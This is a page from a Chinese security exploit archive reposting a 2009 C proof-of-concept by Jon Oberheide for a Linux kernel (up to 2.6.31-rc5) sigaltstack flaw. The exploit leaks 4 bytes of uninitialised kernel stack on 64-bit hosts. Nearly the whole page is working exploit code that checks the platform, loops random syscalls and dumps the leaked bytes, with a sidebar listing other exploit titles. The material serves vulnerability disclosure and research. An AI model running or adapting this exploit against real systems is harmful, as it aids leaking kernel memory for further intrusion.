首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit
来源:http://jon.oberheide.org 作者:Oberheide 发布时间:2009-08-05  

/*
 * sigaltstack-leak.c
 *
 * Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://git.kernel.org/linus/0083fc2c50e6c5127c2802ad323adf8143ab7856
 *
 *   Ulrich Drepper correctly points out that there is generally padding in
 *   the structure on 64-bit hosts, and that copying the structure from
 *   kernel to user space can leak information from the kernel stack in those
 *   padding bytes.
 *
 * Notes:
 *
 *   Only 4 bytes of uninitialized kernel stack are leaked in the padding
 *   between stack_t's ss_flags and ss_size.  The disclosure only affects
 *   affects 64-bit hosts.
 */

#include <stdio.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <time.h>
#include <sys/syscall.h>
#include <sys/types.h>

const int randcalls[] = {
 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 13, 14, 16,
 21, 22, 24, 25, 32, 33, 36, 37, 38, 39, 72, 73,
 78, 79, 96, 97, 97, 102, 104, 105, 106, 107, 108,
 109, 110, 11, 112, 113, 114, 116, 117, 118, 119,
 120, 121, 121, 123, 124, 125, 140, 141, 143, 146
};

void
dump(const unsigned char *p, unsigned l)
{
 printf("stack_t:");
 while (l > 0) {
  printf(" ");
  if (l == 12) {
   printf("*** ");
  }
  printf("%02x", *p);
  if (l == 9) {
   printf(" ***");
  }
  ++p; --l;
 }
 printf("\n");
}

int
main(void)
{
 char *p;
 int call, ret;
 size_t size, ftest, stest;
 stack_t oss;

 size = sizeof(stack_t);

 printf("[+] Checking platform...\n");

 if (size == 24) {
  printf("[+] sizeof(stack_t) = %zu\n", size);
  printf("[+] Correct size, 64-bit platform.\n");
 } else {
  printf("[-] sizeof(stack_t) = %zu\n", size);
  printf("[-] Error: you do not appear to be on a 64-bit platform.\n");
  printf("[-] No information disclosure is possible.\n");
  exit(1);
 }

 ftest = offsetof(stack_t, ss_flags) + sizeof(oss.ss_flags);
 stest = offsetof(stack_t, ss_size);

 printf("[+] Checking for stack_t hole...\n");

 if (ftest != stest) {
  printf("[+] ss_flags end (%zu) != ss_size start (%zu)\n", ftest, stest);
  printf("[+] Hole in stack_t present!\n", ftest, stest);
 } else {
  printf("[-] ss_flags end (%zu) == ss_size start (%zu)\n", ftest, stest);
  printf("[-] Error: No hole in stack_t, something is quite wrong.\n");
  exit(1);
 }

 printf("[+] Ready to call sigaltstack.\n\n");

 for (ret = 5; ret > 0; ret--) {
  printf("%d...\n", ret);
  sleep(1);
 }
 srand(time(NULL));

 while (1) {
  /* random stuff to make stack pseudo-interesting */
  call = rand() % (sizeof(randcalls) / sizeof(int));
  syscall(randcalls[call]);

  ret = sigaltstack(NULL, &oss);
  if (ret != 0) {
   printf("[-] Error: sigaltstack failed.\n");
   exit(1);
  }

  dump((unsigned char *) &oss, sizeof(oss));
 }

 return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Blaze HDTV Player 6.0 (.PLF Fi
·MediaCoder 0.7.1.4486 (.lst) U
·RadASM 2.2.1.5 (.mnu File) Loc
·jetAudio 7.1.9.4030 plus vx (.
·MediaCoder 0.6.2.4275 (.lst Fi
·BlazeDVD 5.1/HDTV Player 6.0 (
·Amaya 11.2 W3C Editor/Browser
·RadASM 2.2.1.6 Menu Editor (.m
·BlazeDVD 5.1 Professional (.PL
·serv-u8 本地提权
·Joomla Component com_jfusion (
·MS Internet Explorer 8.0.7100.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved